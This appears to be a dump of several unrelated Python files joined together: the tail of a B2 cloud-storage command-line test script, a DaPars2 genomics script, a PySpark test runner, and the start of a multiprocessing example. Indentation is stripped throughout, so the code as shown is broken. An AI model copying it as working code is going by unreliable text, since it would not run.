of all file versions, with "+" for upload and "-" for
hide, looking like this:
['+ photos/a.jpg', '- photos/b.jpg', '+ photos/c.jpg']
"""
return [('+ ' if (f['action'] == 'upload') else '- ') + f['fileName'] for f in list_of_files]
def find_file_id(list_of_files, file_name):
for file in list_of_files:
if file['fileName'] == file_name:
return file['fileId']
assert False, 'file not found: %s' % (file_name,)
def sync_up_test(b2_tool, bucket_name):
_sync_test_using_dir(b2_tool, bucket_name, 'sync')
def sync_test_no_prefix(b2_tool, bucket_name):
_sync_test_using_dir(b2_tool, bucket_name, '')
def _sync_test_using_dir(b2_tool, bucket_name, dir_):
sync_point_parts = [bucket_name]
if dir_:
sync_point_parts.append(dir_)
prefix = dir_ + '/'
else:
prefix = ''
b2_sync_point = 'b2:' + '/'.join(sync_point_parts)
with TempDir() as dir_path:
p = lambda fname: os.path.join(dir_path, fname)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([], file_version_summary(file_versions))
write_file(p('a'), b'hello')
write_file(p('b'), b'hello')
write_file(p('c'), b'hello')
# simulate action (nothing should be uploaded)
b2_tool.should_succeed(['sync', '--noProgress', '--dryRun', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([], file_version_summary(file_versions))
os.symlink('broken', p('d'))
# now upload
b2_tool.should_succeed(
['sync', '--noProgress', dir_path, b2_sync_point],
expected_pattern="d could not be accessed"
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'a',
'+ ' + prefix + 'b',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
c_id = find_file_id(file_versions, prefix + 'c')
file_info = b2_tool.should_succeed_json(['get_file_info', c_id])['fileInfo']
should_equal(file_mod_time_millis(p('c')), int(file_info['src_last_modified_millis']))
os.unlink(p('b'))
write_file(p('c'), b'hello world')
b2_tool.should_succeed(
['sync', '--noProgress', '--keepDays', '10', dir_path, b2_sync_point]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'a',
'- ' + prefix + 'b',
'+ ' + prefix + 'b',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
os.unlink(p('a'))
b2_tool.should_succeed(['sync', '--noProgress', '--delete', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([
'+ ' + prefix + 'c',
], file_version_summary(file_versions))
#test --compareThreshold with file size
write_file(p('c'), b'hello world!')
#should not upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'size',
'--compareThreshold', '1', dir_path, b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([
'+ ' + prefix + 'c',
], file_version_summary(file_versions))
#should upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'size', dir_path,
b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
set_file_mod_time_millis(p('c'), file_mod_time_millis(p('c')) + 2000)
#test --compareThreshold with modTime
#should not upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'modTime',
'--compareThreshold', '2000', dir_path, b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
#should upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'modTime',
dir_path, b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
# confirm symlink is skipped
write_file(p('linktarget'), b'hello')
os.symlink('linktarget', p('alink'))
b2_tool.should_succeed(
['sync', '--noProgress', '--excludeAllSymlinks', dir_path, b2_sync_point],
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'linktarget',
],
file_version_summary(file_versions),
)
# confirm symlink target is uploaded (with symlink's name)
b2_tool.should_succeed(['sync', '--noProgress', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'alink',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'linktarget',
],
file_version_summary(file_versions),
)
def sync_down_test(b2_tool, bucket_name):
sync_down_helper(b2_tool, bucket_name, 'sync')
def sync_down_helper(b2_tool, bucket_name, folder_in_bucket):
file_to_upload = 'README.md'
b2_sync_point = 'b2:%s' % bucket_name
if folder_in_bucket:
b2_sync_point += '/' + folder_in_bucket
b2_file_prefix = folder_in_bucket + '/'
else:
b2_file_prefix = ''
with TempDir() as local_path:
# Sync from an empty "folder" as a source.
b2_tool.should_succeed(['sync', b2_sync_point, local_path])
should_equal([], sorted(os.listdir(local_path)))
# Put a couple files in B2, and sync them down
b2_tool.should_succeed(
['upload_file', '--noProgress', bucket_name, file_to_upload, b2_file_prefix + 'a']
)
b2_tool.should_succeed(
['upload_file', '--noProgress', bucket_name, file_to_upload, b2_file_prefix + 'b']
)
b2_tool.should_succeed(['sync', b2_sync_point, local_path])
should_equal(['a', 'b'], sorted(os.listdir(local_path)))
def sync_long_path_test(b2_tool, bucket_name):
"""
test sync with very long path (overcome windows 260 character limit)
"""
b2_sync_point = 'b2://' + bucket_name
long_path = '/'.join(
(
'extremely_long_path_which_exceeds_windows_unfortunate_260_character_path_limit',
'and_needs_special_prefixes_containing_backslashes_added_to_overcome_this_limitation',
'when_doing_so_beware_leaning_toothpick_syndrome_as_it_can_cause_frustration',
'see_also_xkcd_1638'
)
)
with TempDir() as dir_path:
local_long_path = os.path.normpath(os.path.join(dir_path, long_path))
fixed_local_long_path = fix_windows_path_limit(local_long_path)
os.makedirs(os.path.dirname(fixed_local_long_path))
write_file(fixed_local_long_path, b'asdf')
b2_tool.should_succeed(['sync', '--noProgress', '--delete', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(['+ ' + long_path], file_version_summary(file_versions))
def main():
if len(sys.argv) < 3:
usage_and_exit()
path_to_script = 'b2'
account_id = sys.argv[1]
application_key = sys.argv[2]
defer_cleanup = True
test_map = {
'account': account_test,
'basic': basic_test,
'keys': key_restrictions_test,
'sync_down': sync_down_test,
'sync_up': sync_up_test,
'sync_up_no_prefix': sync_test_no_prefix,
'sync_long_path': sync_long_path_test,
'download': download_test,
}
if len(sys.argv) >= 4:
tests_to_run = sys.argv[3:]
for test_name in tests_to_run:
if test_name not in test_map:
error_and_exit('unknown test: "%s"' % (test_name,))
else:
tests_to_run = sorted(six.iterkeys(test_map))
if os.environ.get('B2_ACCOUNT_INFO') is not None:
del os.environ['B2_ACCOUNT_INFO']
b2_tool = CommandLine(path_to_script)
global_dirty = False
# Run each of the tests in its own empty bucket
for test_name in tests_to_run:
print('#')
print('# Cleaning and making bucket for:', test_name)
print('#')
print()
b2_tool.should_succeed(['clear_account'])
b2_tool.should_succeed(['authorize_account', account_id, application_key])
bucket_name_prefix = 'test-b2-command-line-' + account_id
if not defer_cleanup:
clean_buckets(b2_tool, bucket_name_prefix)
bucket_name = bucket_name_prefix + '-' + random_hex(8)
success, _ = b2_tool.run_command(['create_bucket', bucket_name, 'allPublic'])
if not success:
clean_buckets(b2_tool, bucket_name_prefix)
b2_tool.should_succeed(['create_bucket', bucket_name, 'allPublic'])
print('#')
print('# Running test:', test_name)
print('#')
print()
test_fcn = test_map[test_name]
dirty = not test_fcn(b2_tool, bucket_name)
global_dirty = global_dirty or dirty
if global_dirty:
print('#' * 70)
print('#')
print('# The last test was run, cleaning up')
print('#')
print('#' * 70)
print()
clean_buckets(b2_tool, bucket_name_prefix)
print()
print("ALL OK")
if __name__ == '__main__':
if sys.argv[1:] == ['test']:
del sys.argv[1]
unittest.main()
else:
main()
|
Dapars2_Multi_Sample.py
|
import numpy as np
import os
import sys
import datetime
import threading
import scipy as sp
import scipy.stats
from multiprocessing import Pool
from bisect import bisect
import math
import time
import multiprocessing
def time_now():#return time
curr_time = datetime.datetime.now()
return curr_time.strftime("%c")
def Convert_wig_into_bp_coverage(extracted_coverage,extracted_3UTR_region,strand_info):
bp_coverage = np.zeros(extracted_3UTR_region[-1] - extracted_3UTR_region[0])
relative_start = extracted_3UTR_region[0]
for i in range(len(extracted_coverage)):
curr_region_start = extracted_3UTR_region[i] - relative_start
curr_region_end = extracted_3UTR_region[i+1] - relative_start
bp_coverage[curr_region_start:curr_region_end] = extracted_coverage[i]
if strand_info == '-':
bp_coverage = bp_coverage[::-1]
return bp_coverage
def parse_cfgfile(cfg_file):
'''Parse configure file
'''
Aligned_Wig_files=''
output_directory=''
Annotated_3UTR_file=''
Output_result_file=''
Coverage_threshold = 1
Num_threads = 1
sequencing_depth_file = ''
for line in open(cfg_file, 'r'):
if line[0] == '\n' or line[0] == '#':
comments = line;
else:
line = line.rstrip()
command = line.split('=');
if command[0] == 'Aligned_Wig_files':
Aligned_Wig_files = command[1].split(',');
if command[0] == 'Output_directory':
output_directory = command[1]
if output_directory[-1] != '/':
output_directory += '/'
if command[0] == 'Annotated_3UTR':
Annotated_3UTR_file = command[1]
if command[0] == 'Output_result_file':
Output_result_file = command[1]
if command[0] == 'sequencing_depth_file':
sequencing_depth_file = command[1]
if command[0] == 'Num_Threads':
Num_threads = int(command[1])
if command[0] == 'Coverage_threshold':
Coverage_threshold = int(command[1])
if Aligned_Wig_files == '':
print >> sys.stderr, "No aligned BAM file found!"
exit(1)
if output_directory=='':
print >> sys.stderr, "No output directory!"
exit(1)
if Annotated_3UTR_file=='':
print >> sys.stderr, "No annotated 3' UTR file!"
exit(1)
if Output_result_file=='':
print >> sys.stderr, "No result file name!"
exit(1)
if sequencing_depth_file=='':
print >> sys.stderr, "No sequencing depth file!"
exit(1)
return Aligned_Wig_files, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold
def load_sequencing_depth(depth_file):
seq_depth_list = []
for line in open(depth_file, 'r'):
fields = line.strip('\n').split('\t')
seq_depth_list.append(int(fields[-1]))
return np.array(seq_depth_list)
def De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(argv=None):
'''multiple threads version
'''
if len(sys.argv) == 1:
print "Please provide the configure file and specify chr name..."
exit(1)
global no_chr_prefix
cfg_file = sys.argv[1]
curr_processing_chr = sys.argv[2]
no_chr_prefix = "F"
if len(sys.argv) > 3 and sys.argv[3] in ["T","F"]:
no_chr_prefix = sys.argv[3]
print >> sys.stderr, "[%s] Start Analysis ..." % time_now()
Group1_Tophat_aligned_file, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold = parse_cfgfile(cfg_file)
All_Sample_files = Group1_Tophat_aligned_file[:]
Sample_name = []
for sample in All_Sample_files:
sample_name = sample.rsplit('.',1)[0]
Sample_name.append(sample_name)
##Prepare output directory
output_directory = output_directory.strip('/') + '_' + curr_processing_chr + '/'
d = os.path.dirname(output_directory)
if not os.path.exists(d):
os.makedirs(d)
temp_dir = d + '/tmp/'
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
Output_all_prediction_file = output_directory + Output_result_file + '_result_temp.' + curr_processing_chr + '.txt'
Output_result = open(Output_all_prediction_file, 'w')
num_samples = len(All_Sample_files)
print >> sys.stderr, "All samples Joint Processing %s ..." % curr_processing_chr
print >> sys.stderr, "[%s] Loading Coverage ..." % time_now()
All_samples_Target_3UTR_coverages, UTR_events_dict = Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Sample_files, Annotated_3UTR_file, Num_threads,curr_processing_chr)
All_samples_sequencing_depths = load_sequencing_depth(sequencing_depth_file)
print All_samples_sequencing_depths
All_sample_coverage_weights = All_samples_sequencing_depths/np.mean(All_samples_sequencing_depths)
#print All_sample_coverage_weights
print >> sys.stderr, "[%s] Loading Coverage Finished ..." % time_now()
#Write the first line
first_line = ['Gene','fit_value','Predicted_Proximal_APA','Loci']
for i in range(num_samples):
#curr_long_exp = 'Sample_%s_long_exp' % str(i+1)
#curr_short_exp = 'Sample_%s_short_exp' % str(i+1)
curr_ratio = '%s_PDUI' % str(Sample_name[i])
#first_line.extend([curr_long_exp,curr_short_exp,curr_ratio])
first_line.append(curr_ratio)
Output_result.writelines('\t'.join(first_line) + '\n')
All_events_ids = UTR_events_dict.keys()
num_threads = Num_threads
Assigned_events_ids_all_threads = Assign_to_different_processor_balance_events(All_events_ids, num_threads)
num_real_threads = len(Assigned_events_ids_all_threads)
Output_each_processor_all = []
for i in range(num_real_threads):
curr_temp_output = temp_dir + 'Each_processor_3UTR_Result_%s.txt' % (str(i+1))
Output_each_processor_all.append(curr_temp_output)
processes = []
for i in range(num_real_threads):
process = multiprocessing.Process(target=Each_Thread_3UTR_estimation_list_version_sample_ids, args=(Assigned_events_ids_all_threads[i], UTR_events_dict, All_sample_coverage_weights, num_samples, Output_each_processor_all[i], All_samples_Target_3UTR_coverages, Coverage_threshold))
process.start()
processes.append(process)
for p in processes:
p.join()
#Combine results
for i in range(num_real_threads):
curr_result = Output_each_processor_all[i]
for line in open(curr_result, 'r'):
Output_result.writelines(line)
Output_result.close()
#print >> sys.stderr, "[%s] Filtering the Results ..." % time_now()
#Output_all_filtered_prediction_file = output_directory + Output_result_file + '_results_final.' + curr_processing_chr + '.txt'
#Dapars_Filtering(Output_all_prediction_file, num_samples, Output_all_filtered_prediction_file)
print >> sys.stderr, "[%s] Finished!" % time_now()
def Each_Thread_3UTR_estimation_list_version_sample_ids(curr_thread_UTR_events_ids, UTR_events_dict, All_sample_coverage_weights, num_samples, Output_result_file, All_samples_coverage_shared_dict, Coverage_threshold):
Output_result = open(Output_result_file,'w')
for curr_3UTR_id in curr_thread_UTR_events_ids:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_id]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
curr_strand = curr_3UTR_structure[-2]
UTR_pos = curr_3UTR_structure[-1]
curr_3UTR_all_samples_bp_coverage = []
for i in range(num_samples):
curr_sample_curr_3UTR_coverage_wig = All_samples_coverage_shared_dict[curr_3UTR_id, i]
curr_3UTR_curr_sample_bp_coverage = Convert_wig_into_bp_coverage(curr_sample_curr_3UTR_coverage_wig[0], curr_sample_curr_3UTR_coverage_wig[1], curr_strand)
curr_3UTR_all_samples_bp_coverage.append(curr_3UTR_curr_sample_bp_coverage)
select_mean_squared_error, selected_break_point, UTR_abundances = De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(curr_3UTR_all_samples_bp_coverage, region_start, region_end,curr_strand,All_sample_coverage_weights, Coverage_threshold)
if str(select_mean_squared_error) != "Na":
num_non_zero = 1
if num_non_zero > 0:
All_long_inclusion_ratios = []
line_write = [curr_3UTR_id, "%.1f" % select_mean_squared_error, str(selected_break_point), UTR_pos]
for i in range(num_samples):
if UTR_abundances[0][i] != 'NA':
# long 3'UTR percentage
curr_sample_ratio = float(UTR_abundances[0][i])/(float(UTR_abundances[0][i]) + float(UTR_abundances[1][i]))
All_long_inclusion_ratios.append(curr_sample_ratio)
#line_write.append("%.2f" % UTR_abundances[0][i])#long 3' UTR abundance
#line_write.append("%.2f" % UTR_abundances[1][i])#short 3' UTR abundance
line_write.append("%.2f" % curr_sample_ratio)
else:
line_write.extend(['NA']*1)
Output_result.writelines( '\t'.join(line_write) + '\n')
Output_result.close()
def De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(All_Samples_curr_3UTR_coverages, UTR_start, UTR_end, curr_strand, weight_for_second_coverage, Coverage_threshold):
coverage_threshold = Coverage_threshold
search_point_start = 150 ##200
search_point_end = int(abs((UTR_end - UTR_start))*0.05)
num_samples = len(All_Samples_curr_3UTR_coverages)
#Read Coverage
Region_Coverages = []
Pass_threshold_index = []
for i in range(num_samples):
curr_Region_Coverage_raw = All_Samples_curr_3UTR_coverages[i]
curr_Region_Coverage = curr_Region_Coverage_raw/weight_for_second_coverage[i]
curr_first_100_coverage = np.mean(curr_Region_Coverage_raw[0:99])
if curr_first_100_coverage > coverage_threshold:
Pass_threshold_index.append(i)
Region_Coverages.append(curr_Region_Coverage)
least_pass_coverage_num = num_samples * least_pass_coverage_percentage
if len(Pass_threshold_index) > least_pass_coverage_num and UTR_end - UTR_start >=150:
if curr_strand == "+":
search_region = range(UTR_start+search_point_start, UTR_end-search_point_end+1)
else:
search_region = range(UTR_end - search_point_start, UTR_start+search_point_end-1, -1)
search_region_start = search_point_start
search_region_end = UTR_end - UTR_start - search_point_end
Mean_squared_error_list = []
Estimated_3UTR_abundance_list = []
for curr_point in range(search_region_start, search_region_end+1):
curr_search_point = curr_point
All_samples_result = [[],[],[]]
for curr_sample_region_coverage in Region_Coverages:
Mean_Squared_error, Long_UTR_abun, Short_UTR_abun = Estimation_abundance(curr_sample_region_coverage, curr_search_point)
All_samples_result[0].append(Mean_Squared_error)
All_samples_result[1].append(Long_UTR_abun)
All_samples_result[2].append(Short_UTR_abun)
Mean_Squared_error = np.mean(np.array(All_samples_result[0]))
Mean_squared_error_list.append(Mean_Squared_error)
Estimated_3UTR_abundance_list.append([All_samples_result[1],All_samples_result[2]])
if len(Mean_squared_error_list) > 1:
min_ele_index = Mean_squared_error_list.index(min(Mean_squared_error_list))
select_mean_squared_error = Mean_squared_error_list[min_ele_index]
selected_break_point = search_region[min_ele_index]
UTR_abundances = [['NA']*num_samples, ['NA']*num_samples]
UTR_abundances_passed = Estimated_3UTR_abundance_list[min_ele_index]
for k in range(len(Pass_threshold_index)):
UTR_abundances[0][Pass_threshold_index[k]] = UTR_abundances_passed[0][k]
UTR_abundances[1][Pass_threshold_index[k]] = UTR_abundances_passed[1][k]
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
return select_mean_squared_error, selected_break_point, UTR_abundances
def Estimation_abundance(Region_Coverage, break_point):
Long_UTR_abun = np.mean(Region_Coverage[break_point:])
Short_UTR_abun = np.mean(Region_Coverage[0:break_point] - Long_UTR_abun)
if Short_UTR_abun < 0:
Short_UTR_abun = 0
Coverage_diff = Region_Coverage[0:break_point] - Long_UTR_abun - Short_UTR_abun
Coverage_diff= np.append(Coverage_diff, Region_Coverage[break_point:] - Long_UTR_abun)
Mean_Squared_error = np.mean(Coverage_diff**2)
return Mean_Squared_error, Long_UTR_abun, Short_UTR_abun
def Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Wig_files,UTR_Annotation_file, num_threads,curr_processing_chr):
num_samples = len(All_Wig_files)
UTR_events_dict = {}
for line in open(UTR_Annotation_file, 'r'):
fields = line.strip('\n').split('\t')
curr_chr = fields[0]
if curr_chr == curr_processing_chr:
region_start = fields[1]
region_end = fields[2]
curr_strand = fields[-1]
UTR_pos = "%s:%s-%s" %(curr_chr, region_start, region_end)
end_shift = int(round(abs(int(region_start) - int(region_end)) * 0.2))
if curr_strand == "+":
region_end = str(int(region_end) - end_shift)
else:
region_start = str(int(region_start) + end_shift)
region_start = int(region_start) + 1
region_end = int(region_end) - 1
if region_start + 50 < region_end:
UTR_events_dict[fields[3]] = [fields[0],region_start,region_end,fields[-1],UTR_pos]
Assigned_index = Assign_to_different_processor_balance(num_samples, num_threads)
manager = multiprocessing.Manager() # create only 1 Manager
All_samples_extracted_3UTR_coverage_dict = manager.dict() # create only 1 dict
processes = []
Final_assigned_threads_num = len(Assigned_index)
for i in range(Final_assigned_threads_num):
process = multiprocessing.Process(target=load_wig_funct_shared_dict_sampleid_key, args=(All_Wig_files, Assigned_index[i], UTR_events_dict,curr_processing_chr,All_samples_extracted_3UTR_coverage_dict))
process.start()
processes.append(process)
for p in processes:
p.join()
return All_samples_extracted_3UTR_coverage_dict, UTR_events_dict
def load_wig_funct_shared_dict_sampleid_key(All_wig_files, assigned_indexes,UTR_events_dict, curr_processing_chr, All_samples_extracted_3UTR_coverage_dict):
'''
All_samples_extracted_3UTR_coverage_dict: sample id is the key.
'''
for i in assigned_indexes:
curr_wig_file = All_wig_files[i]
print >> sys.stderr, curr_wig_file
curr_sample_All_chroms_coverage_dict = {}
with open(curr_wig_file, 'r') as fin:
for line in fin:
if line[0] != '#' and line[0] != 't':
fields = line.strip('\n').split('\t')
chrom_name = (no_chr_prefix == "T")*'chr' + fields[0]
# print >> sys.stderr, chrom_name
if chrom_name == curr_processing_chr:
region_start = int(fields[1])
region_end = int(fields[2])
if chrom_name not in curr_sample_All_chroms_coverage_dict:
curr_sample_All_chroms_coverage_dict[chrom_name] = [[0],[0]]
if region_start > curr_sample_All_chroms_coverage_dict[chrom_name][0][-1]:
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_start)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(0)
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_end)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(int(float(fields[-1])))
else:
if len(curr_sample_All_chroms_coverage_dict)>0:
break
fin.close()
if curr_processing_chr not in curr_sample_All_chroms_coverage_dict:
print >> sys.stderr, 'no wig: ' + curr_wig_file
else:
curr_sample_All_chroms_coverage_dict[curr_processing_chr][1].append(0)
curr_sample_coverage_dict = {}
for curr_3UTR_event_id in UTR_events_dict:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_event_id]
curr_chr_local = curr_3UTR_structure[0]
if curr_chr_local in curr_sample_All_chroms_coverage_dict:
curr_chr_coverage = curr_sample_All_chroms_coverage_dict[curr_chr_local]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
left_region_index = bisect(curr_chr_coverage[0],region_start)
right_region_index = bisect(curr_chr_coverage[0],region_end)
extracted_coverage = curr_chr_coverage[1][left_region_index:right_region_index+1]
extracted_3UTR_region = curr_chr_coverage[0][left_region_index:right_region_index]
extracted_3UTR_region.insert(0,region_start)
extracted_3UTR_region.append(region_end)
curr_event_info = [extracted_coverage,extracted_3UTR_region]
All_samples_extracted_3UTR_coverage_dict[curr_3UTR_event_id,i] = curr_event_info
def Assign_to_different_processor_balance(Total_number, num_processors):
Assigned_results = []
num_each_processor = Total_number/num_processors
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(range((i)*(num_each_processor + 1), (i+1)*(num_each_processor + 1)))
for i in range(num_processors-remain):
Assigned_results.append(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1)))
return Assigned_results
def Assign_to_different_processor_balance_events(All_events_ids, num_processors):
Assigned_results = []
Total_number = len(All_events_ids)
num_each_processor = Total_number/num_processors
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(range((i)*(num_each_processor+1), (i+1)*(num_each_processor+1)))
for i in range(num_processors-remain):
Assigned_results.append(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1)))
#print assigned Results
Assigned_events = []
print '#assigned events:'
for curr_processor_inds in Assigned_results:
curr_processor_events = []
print len(curr_processor_inds)
for curr_ele in curr_processor_inds:
curr_processor_events.append(All_events_ids[curr_ele])
Assigned_events.append(curr_processor_events)
return Assigned_events
#global parameters
least_pass_coverage_percentage = 0.3
De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(sys.argv)
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser
import os
import re
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
if sys.version < '3':
import Queue
else:
import queue as Queue
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
def run_individual_python_test(test_name, pyspark_python):
env = dict(os.environ)
env.update({'SPARK_TESTING': '1', 'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)})
LOGGER.debug("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
stderr=per_test_output, stdout=per_test_output, env=env).wait()
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
per_test_output.close()
LOGGER.info("Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.6", "python3.4", "pypy"] if which(x)]
if "python2.6" not in python_execs:
LOGGER.warning("Not testing against `python2.6` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def main():
opts = parse_opts()
if (opts.verbose):
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test against the following Python executables: %s", python_execs)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
if test_goal in ('pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests'):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
if __name__ == "__main__":
main()
|
multi-badq.py
|
### these both fail: can't put bound method on Pipe or Queue!
class Spam:
def action(self): print(99)
from multiprocessing import Process, Pipe
def sender(pipe):
pipe.send(Spam().action)
pipe.close()
if __name__ == '__main__':
(parentEnd, childEnd) = Pipe()
